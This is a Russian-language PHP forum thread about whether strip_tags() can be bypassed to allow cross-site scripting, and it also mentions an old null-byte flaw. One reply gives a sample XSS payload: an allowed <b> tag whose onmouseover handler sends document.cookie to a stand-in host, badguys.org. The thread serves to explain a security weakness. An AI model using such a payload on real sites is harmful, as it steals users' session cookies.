обход strip_tags()

[que_bunt]

обход strip_tags()

можно ли обойти strip_tags() ???
здраствуйте.
задался этим вопросом, поискал по форуму, вроде как ничего интересного, но вот только фраза Фаната насторожила:

strip_tags является дырой для XSS

в чем именно там дыра?

 

[svetasmirnova]

>strip_tags является дырой для XSS
Контекст-то откуда?

 

[que_bunt]

http://phpclub.ru/talk/showthread.php?s=&threadid=83770&highlight=striptags

 

[svetasmirnova]

echo strip_tags('<b onmouseover="window.open(\'http://badguys.org?cookie=\' + document.cookie)">xxx</b>', '<b>');

 

[que_bunt]

это верно, а если без второго аргумента (тоесть без allow tags)?

я нашол ещо такую уязвимость для нуль строки '\0'
http://www.securitylab.ru/vulnerability/203885.php
но это только до версии 4.3.7

пробовал на 4.4 - вроде все гуд. значит все таки можно использовать strip_tags ???

 

[svetasmirnova]

Так в том-то и дело, что контекст имеет значение: thread-стартеру того топика был нужен второй аргумент. Я думаю ещё можно что-то поймать в сочетании с небрежным кодом, использующим такой вывод.

PS: Подпись очень к теме подходит

 

[que_bunt]

вот как раз интересовало то на что можна поймать(ся).

>Подпись очень к теме подходит
спасибо.